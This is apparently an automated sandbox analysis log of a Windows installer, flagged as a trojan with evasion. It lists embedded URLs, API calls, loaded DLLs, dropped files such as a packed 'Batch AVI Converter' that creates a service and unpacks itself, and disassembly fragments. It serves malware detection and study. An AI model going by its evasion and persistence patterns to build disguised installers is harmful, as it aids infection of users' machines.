        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://www.certum.pl/CPS0
        Source: file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drString found in binary or memory: http://www.innosetup.com/
        Source: file.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
        Source: file.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://www.openssl.org/f
        Source: is-NTR8S.tmp.1.drString found in binary or memory: http://www.openssl.org/support/faq.html
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: https://d.symcb.com/cps0%
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0.
        Source: is-7PIOL.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: https://www.certum.pl/CPS0
        Source: is-7PIOL.tmp.1.drString found in binary or memory: https://www.openssl.org/H
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004706A81_2_004706A8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004809F71_2_004809F7
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004352C81_2_004352C8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004673A41_2_004673A4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0043035C1_2_0043035C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004444C81_2_004444C8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004345C41_2_004345C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00444A701_2_00444A70
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00486BD01_2_00486BD0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00430EE81_2_00430EE8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045F0C41_2_0045F0C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004451681_2_00445168
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0045B1741_2_0045B174
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004694041_2_00469404
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004455741_2_00445574
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004519BC1_2_004519BC
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00487B301_2_00487B30
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0043DD501_2_0043DD50
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0048DF541_2_0048DF54
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_023712601_2_02371260
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_02371D201_2_02371D20
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DC79DA3_2_02DC79DA
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DBB8D73_2_02DBB8D7
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DA53A03_2_02DA53A0
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D9E17D3_2_02D9E17D
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D99E743_2_02D99E74
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DA4E293_2_02DA4E29
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D8EFAC3_2_02D8EFAC
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D9DC893_2_02D9DC89
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D984323_2_02D98432
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D9AC2A3_2_02D9AC2A
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D9E5953_2_02D9E595
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02DA2DB43_2_02DA2DB4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00408C0C appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00406AC4 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 0040595C appears 117 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00457F1C appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00403400 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00445DD4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00457D10 appears 96 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 004344DC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 004078F4 appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00403494 appears 83 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00403684 appears 225 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 00453344 appears 97 times
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: String function: 004460A4 appears 59 times
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: String function: 02DA5330 appears 138 times
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: String function: 02D98AD0 appears 37 times
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-9JGQO.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-9JGQO.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-9JGQO.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-FH5VO.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: batchaviconverter32_64.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: DKIM Authenticator lib 9.11.45.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@6/27@1/1
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D908A8 FormatMessageA,GetLastError,3_2_02D908A8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_0040273F
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_0040B846 StartServiceCtrlDispatcherA,lstrcmpiW,3_2_0040B846
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_0040B846 StartServiceCtrlDispatcherA,lstrcmpiW,3_2_0040B846
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_0040223D LoadLibraryExA,lstrcmpiW,GetProcAddress,StartServiceCtrlDispatcherA,3_2_0040223D
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_0040B173 StartServiceCtrlDispatcherA,3_2_0040B173
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_004021F8 StartServiceCtrlDispatcherA,3_2_004021F8
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_004021F8 StartServiceCtrlDispatcherA,3_2_004021F8
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: file.exeReversingLabs: Detection: 15%
        Source: file.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
        Source: file.exeString found in binary or memory: /LOADINF="filename"
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe "C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Batch AVI Converter_is1Jump to behavior
        Source: file.exeStatic file information: File size 3488773 > 1048576
        Source: Binary string: msvcp71.pdbx# source: is-0D2S5.tmp.1.dr
        Source: Binary string: msvcr71.pdb< source: is-O4BPT.tmp.1.dr
        Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-7PIOL.tmp.1.dr
        Source: Binary string: msvcp71.pdb source: is-0D2S5.tmp.1.dr
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000002.3334319199.000000000068E000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091477293.0000000003140000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091585886.00000000021F8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3334991666.0000000002373000.00000002.00000001.01000000.00000007.sdmp, _isdecmp.dll.1.dr
        Source: Binary string: msvcr71.pdb source: is-O4BPT.tmp.1.dr

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeUnpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack .text:ER;_areg_2:R;.data:W;.rsrc:R;_breg_2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeUnpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
        Source: batchaviconverter32_64.exe.1.drStatic PE information: section name: _areg_2
        Source: batchaviconverter32_64.exe.1.drStatic PE information: section name: _breg_2
        Source: is-FH5VO.tmp.1.drStatic PE information: section name: .eh_fram
        Source: DKIM Authenticator lib 9.11.45.exe.3.drStatic PE information: section name: _areg_2
        Source: DKIM Authenticator lib 9.11.45.exe.3.drStatic PE information: section name: _breg_2
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
